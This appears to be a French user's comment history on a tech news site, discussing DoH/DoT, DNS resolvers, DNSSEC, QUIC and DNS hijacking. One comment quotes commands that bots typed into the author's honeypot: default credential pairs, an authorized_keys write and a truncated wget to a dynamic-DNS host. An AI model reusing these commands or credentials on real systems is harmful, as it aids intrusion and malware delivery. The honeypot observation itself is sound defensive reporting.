Le 12/03/2020 à 08h 24

Rien à voir avec DoH qui n’est après tout qu’un protocole. Quand la moitié du courrier électronique file chez Gmail, est-ce qu’on dit que SMTP est « centralisé ».

DoH n’implique pas du tout d’aller chez CloudFlare. L’article donne d’ailleurs une liste de résolveurs DoH. J’y ajoute le mien, pendant qu’on y est, cf.https://www.bortzmeyer.org/doh-bortzmeyer-fr-policy.html

Le 12/03/2020 à 08h 22

D’abord, il est tout à fait faux, comme on le lit souvent, que DoT (DNS sur TLS) serait « dans l’OS » alors que DoH (DNS sur HTTPS) serait « dans le navigateur ». Les deux techniques (et le DNS classique) peuvent parfaitement être déployées dans l’OS ou dans l’application. Zéro différence entre DoT et DoH sur ce point.https://www.bortzmeyer.org/doh-et-ses-adversaires.html

Ensuite, DoT est déployé, la plupart des résolveurs DoH acceptent également DoT, Android a DoT en standard depuis une ou deux versions, etc. Chacun peut choisir.

Le 12/03/2020 à 08h 19

Faire du DoH au dessus de Tor serait plus simple et donnerait le même résultat.

Le 12/03/2020 à 08h 19

Deux solutions : 1) ignorer le problème car ce n’est pas la même chose que de dire qu’on utilise tel ou tel résolveur, que de dire qu’on visite pornhub.com ou alcooloques-anonymes.org 2) Mettre l’adresse de Quad9 au lieu de son nom.

Le 05/03/2020 à 08h 28

Vu par les sondes RIPE Atlas, ça donne ça :https://framagit.org/snippets/5051

Le 24/02/2020 à 16h 28

Le numérique et l’Internet regorgent de sujets qui sont à la fois très présents et jamais expliqués et contextualisés en partant du début. Si on n’a pas suivi tous les épisodes précédents, ces sujets sont très difficiles à suivre.

La forme papier me parait bien adaptée à des articles de fond, plus
déconnectés de l’actualité, et reprenant un sujet complexe depuis le
début (comme ceux sur Hadopi et sur la copie privée, dans le premier
numéro).

Quelques suggestions, où vous allez probablement dire « mais tout le monde connait cela » mais où je soupçonne que pas mal de lecteurs seraient ravis qu’on reprenne calmement : le logiciel libre, le chiffrement, la neutralité, IPv6, la blockchain, etc.

Le 24/02/2020 à 12h 58

“Signal … Amazon” Source ? Je ne vois rien de tel avec Signal. D’où vient cette information ?

Le 17/02/2020 à 10h 11

Je ne connaissais même pas ce “Global Digital Marketing”. Vu son nom, je suis plutôt content qu’il soit annulé.

Le 04/02/2020 à 09h 07

J’en profite pour rappeler qu’il faut utiliser une supervision automatique de ses certificats, pour éviter celahttps://www.bortzmeyer.org/tester-expiration-certifs.html

Le 22/01/2020 à 13h 04

C’est très rigolo de regarder ce que tapent les bots. Ce matin :
 
root / root@1234 et admin / 123456 -> écriture dans .ssh/authorized_keys
 
admin / admin ->  wgethttp://parabellum.ddnsgeek.com" />08…
 
root / root ->
ps -ef | grep ‘[Mm]iner’

Le 22/01/2020 à 11h 38

Dans le lot, il doit y avoir mon pot de miel (“honeypot”, en anglosaxonien) à la maison puisqu’il répond en telnet (port 23) et SSH (port 22) et accepte tous les logins / mots de passe essayés (souvent root/admin), puis enregistre les commandes tapées (de uname à wget). Bref, une telle base constituée automatiquement va comporter un certain nombre de faux positifs.

 PS : Shodan fournit déjà la liste des machines qui répondent en telnet.

Le 09/01/2020 à 12h 31

Excellente nouvelle. Bravo, la SACEM. J’espère que cela mettra fin à cette pratique insupportable du bruit imposé dans les parties communes de l’hôtel.

Le 18/12/2019 à 16h 19

Si on ne contrôle pas la machine de l’utilisateur, c’est en effet game over. Même sans DoH, le navigateur peut toujours faire des requêtes DNS/DoT/Namecoin/ce qu’il veut.

Et la seule vraie protection, ce sont des parents disponibles, et qui éduquent. Oui.

Le 18/12/2019 à 14h 30

« les solutions de contrôle parental deviennent inopérantes » C’est tellement résumé que ça en devient n’importe quoi. Non, les seules solutions de contrôle parental qui sont impactées sont celles extérieures à la machine, et utilisant le DNS, donc une minorité.

Le 09/10/2019 à 08h 40

On me fait remarquer que le code Javascript de ce portail fait une requête vers un domaine personnel, àhttps://api-codes-sources-fr.antoine-augusti.fr. C’est dur, le RGPD.

Le 02/10/2019 à 09h 34

Le problème de ce qui est disponible dans les systèmes d’exploitation est secondaire (tout le monde utilise un Unix donc a SCTP depuis longtemps, par exemple) par rapport au problème des middleboxes (boitiers intermédiaires) qui bloquent tout ce qu’ils ne connaissent pas.

Le 01/10/2019 à 09h 21

Le navigateur ne peut pas faire la résolution en TLS, il n’y a pas (encore ?) de norme pour parler en TLS aux serveurs faisant autorité. (Le RFC 7858, DNS sur TLS, est pour le lien entre M. Michu et le résolveur.)
 

Le 30/09/2019 à 15h 25

Le RFC n’est pas encore sorti. Il existe des mises en œuvre en logiciel libre (dont une de Cloudflare) mais rien de très intégré aux serveurs HTTP existants, je crois.

Le 30/09/2019 à 11h 45

Euh non, rien à voir. Vous confondez DoH (un protocole) avec Cloudflare (une société).https://www.bortzmeyer.org/doh-et-ses-adversaires.html

Le 30/09/2019 à 11h 44

Il n’est pas prévu de faire traiter les problèmes de congestion, de réémission, etc, par HTTP. C’est QUIC qui le fera. « HTTP/3 » n’est qu’une étiquette marketing, sans significtaion technique. (Le passage de HTTP/1 à HTTP/2 avait entrainé bien plus de changements.)

Le 30/09/2019 à 11h 42

Non, en QUIC. UDP n’est là que pour calmer les middleboxes stupides.

Le 30/09/2019 à 11h 39

La description « HTTP/3 est basé sur UDP, et non TCP » est à la fois exacte et très trompeuse. Et cela explique beaucoup des questions posées ici. QUIC est un concurrent de TCP. Il en assure toutes les fonctions (dont la réémission en cas de perte de paquet).

QUIC devrait, dans un monde idéal, fonctionner directement sur IP. Mais comme les « middleboxes » à la c… l’empêchent, il tournera sur UDP, comme tout autre protocole de transport nouveau (SCTP avait déjà montré le chemin). UDP n’est donc qu’une très mince couche entre IP et QUIC, le « vrai » protocole de transport.

Le 21/09/2019 à 10h 49

Sur la question du référencement, je viens de taper “manach” dans Qwant et en premier, dans la colonne News, on voit justement cet article. 

Le 11/03/2019 à 10h 41

Avec un tel raisonnement, on ne ferait jamais de politique (ou alors seulement sur de toutes petites choses sans importance comme de changer la durée du mandat présidentiel, ou le nombre de députés). La politique, c’est d’agir pour les choses qui ne se font pas spontanément. (Theodore Roosevelt, à propos du démantelement de la Standard Oil.)

Le 11/03/2019 à 10h 24

Je résume : arguments de droite, idiots, sexistes (contre Ocasio-Cortez), attaques personnelles, bref du troll à ignorer.

Le 25/02/2019 à 16h 09

Certainement pas les navigateurs, Internet, ce n’est pas que le Web !

 - les gérants des zones DNS (pas nextinpact.com, qui est partiellement OK, mais les autres)

• les gérants des résolveurs (FAI pour l’accès à la maison, DSI pour l’entreprise)

Le 25/02/2019 à 14h 46

Que ceux de FDN soient bien ou pas d’y change rien :https://www.bortzmeyer.org/dns-resolveurs-publics.html

Le 25/02/2019 à 14h 36

J’ai bien dit que je déconseillais l’utilisation de résolveurs DNS publics états-uniens.

Personnellement, j’utilise toujours les résolveurs du réseau local, contrôlés par moi ou par mon employeur.

Le 25/02/2019 à 14h 14

Les deux méthodes (reproduction du vrai site, ou bien homme du milieu, bien que ce nom ne soit pas parfaitement adapté ici) sont possibles.

Et les attaquants avaient des certificats, qu’on peut voir avec crt.sh.
 

Le 25/02/2019 à 14h 08

Oui, DNSSEC est de bout en bout (si on valide sur une machine de confiance, bien sûr ; au bureau, c’est une machine de mon employeur, à la maison, une machine du réseau local que je contrôle).

DNScrypt n’a rien à voir : il protège le canal et pas les données et n’est donc pas de bout en bout.

Le 25/02/2019 à 14h 06

Par contre, je ne comprends pas bien la « seule contrainte » dont vous parlez. Let’s Encrypt utilise évidement les mêmes serveurs faisant autorité que tout le monde. Leur résolveur demande au domaine du dessus et obtient la même liste que tout le monde. Donc, si je contrôle nextinpact.com et que je change les enregistrements, tout le monde les verra (c’est le principe du DNS).

Le 25/02/2019 à 14h 04

Et c’est justement ce qu’ont fait les attaquants (l’article de Krebs, cité par Next Inpact, contient tous les détails techniques). Les journaux « certificate transparency » montrent bien les certificats Let’s Encrypt obtenus par les attaquants.

Le 25/02/2019 à 14h 03

J’avoue ne pas bien comprendre votre message. Oui, contrôler le DNS permet en effet de mettre une adresse IP de son choix à la place de la vraie. C’est justement le principe de cette attaque. Une fois que c’est fait, les clients vont vers vous et plus vers le bon serveur. Vous avez gagné. Si vous pouvez contrôler facebook.com, vous avez tout le trafic de Facebook.

Le 25/02/2019 à 14h 01

Quad9 est en effet un résolveur DNSSEC validant (vérifiant les signatures DNSSEC). Comme des tas d’autres. Après, ça n’est qu’un résolveur, il faut encore que les serveurs faisant autorité servent des signatures (que les zones soient signées).

Et utiliser un résolveur public états-unien pose d’autres problèmes….
 

Le 14/01/2019 à 13h 01

Il n’y a pas interruption de service si le site pirate sert de relais (terminant la session TLS, et en faisant une nouvelle vers le vrai site Web).

Le 14/01/2019 à 12h 59

Pas complètement d’accord. En théorie, vous avez raison. Mais en pratique, dans pas mal de boîtes, il y a des services qui sont à peu près correctement gérés, et il y a le DNS, qui est sous le radar, pas pris en compte, et dont le mot de passe du compte chez l’hébergeur ou le BE est sur un post-it connu de tout le monde et du stagiaire.
C’est le mérite du rapport de FeuŒil. Rien de nouveau, en effet, mais une utile piqure de rappel : n’oubliez pas les noms de domaine !

Le 14/01/2019 à 12h 54

« Alors que l’entrée « A » désigne le serveur principal, la « NS » permet
de ne toucher qu’à un sous-domaine précis, comme celui d’un webmail. » Cela ne veut absolument rien dire. Il faut virer cette phrase. Proposition de remplacement : Alors que l’entrée « A » désigne l’adresse IP d’un serveur donné, les « NS » permettent au pirate de rediriger ses victimes vers ses propres serveurs de noms, lui donnant un meilleur contrôle sur le domaine détourné.

Le 09/11/2018 à 14h 06

On ne pourra pas taper « nos optimisations fiscales » dans un document sans que Word n’insère à la place la liste des comptes de la boîte dans les paradis fiscaux, avant d’envoyer à Mediapart un lien vers le document.

Le 03/07/2018 à 09h 02

Notez que l’utilisation du DNS n’est qu’une des façons d’exploiter la faille. LTE permet de modifier les données, et on peut changer bien d’autre chose que l’adresse IP du résolveur DNS.
 
D’autre part, DNSSEC est certes une excellente techniquej, très utile (d’ailleurs, Next Inpact le teste, c’est direhttps://dns.bortzmeyer.org/nextinpact.com/DNSKEYhttps://dns.bortzmeyer.org/nextinpact.com/DS) mais, DANS CE CAS PRÉCIS, elle ne servirait pas à grand’chose puisque rare sont les smartphones qui valident (la validation est typiquement faite sur le résolveur, justement ce qui est détourné).

Le 30/06/2018 à 08h 48

Les ptérosaures ne sont PAS des dinosaures.

Le 27/06/2018 à 09h 27

« Bordélique  » au sens de « ce n’est pas Disneyland, aucune entreprise centralisée n’a mis de l’ordre là-dedans et chacun fait ce qu’il veut  » ? Oui, c’est nul, la liberté.

Le 02/05/2018 à 13h 17

Voir aussi la réaction de Reporters sans Frontièreshttps://rsf.org/fr/actualites/rsf-demande-google-de-retablir-le-domain-fronting-…

Le 03/04/2018 à 08h 50

Et, de toute façon, c’est absurde de le faire sur la machine terminale, où ça peut être difficile (Network Manager, systemd-resolve) ou impossible (Android non rooté). Ça doit plutôt être fait dans un engin spécialisé, tout fait (Turris Omnia…) annoncé en DHCP.

Le 03/04/2018 à 08h 49

En quoi Quad9 est-il meilleur que Cloudflare ?

Le 03/04/2018 à 08h 04

Le meilleur résolveur ? (“DNS” tout court ne veut pas dire grand’chose.) Le résolveur local, sur une machine que je contrôle.

Le 03/04/2018 à 08h 02

Et puis c’est une racine alternative (donc ils ajoutent des TLD bidons) et question vie privée, c’est zéro, le trafic étant en clair (à moins que vous ne fassiez partie de la minorité des utilisateurs d’OpenNIC ,qui ont réussi à déployer dnscrypt).

Le 03/04/2018 à 08h 01

« C’est vrai que le protocole aurait besoin d’un bon coup de dépoussiérage » Ça fait juste quatre ans que le projet “DNS privacy” à l’IETF a commencé et Cloudflare met en œuvre au moins deux de ses RFC. Mais on accepte des volontaires :-) Ce n’est pas parce que les médias ne s’en étaient pas aperçus que rien n’était fait.

Pour la box déjà toute prête, avec résolveur DNS, il en existe plusieurs, comme la Turris Omnia.

Le 03/04/2018 à 07h 58

Cloudflare permet d’authentifier le serveur en DNS-sur-TLS par “The certificate presented is for cloudflare-dns.com”

 % openssl s_client -connect 1.1.1.1" />53 -showcerts
CONNECTED(00000003)
depth=2 C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA
verify return:1
depth=1 C = US, O = DigiCert Inc, CN = DigiCert ECC Secure Server CA
verify return:1
depth=0 C = US, ST = CA, L = San Francisco, O = “Cloudflare, Inc.”, CN = *.cloudflare-dns.com
verify return:1
—

RFC 8310, section 8.1

Le 03/04/2018 à 07h 56

Rien de bizarre, on sait depuis des années que le préfixe 1.1.1.0/24 est pourri, utilisé dans plein de documentations écrites par des incompétents, et mis dans plein de configurations par défaut faites par des zozos.https://labs.ripe.net/Members/gih/content-traffic-network-10008

Le 26/03/2018 à 09h 42

Notez que le gouvernement ment, très clairement. Ils ont affirmé qu’il n’y a pas eu de fuite alors que les données sont publiées :https://twitter.com/zackwhittaker/status/977635556665561088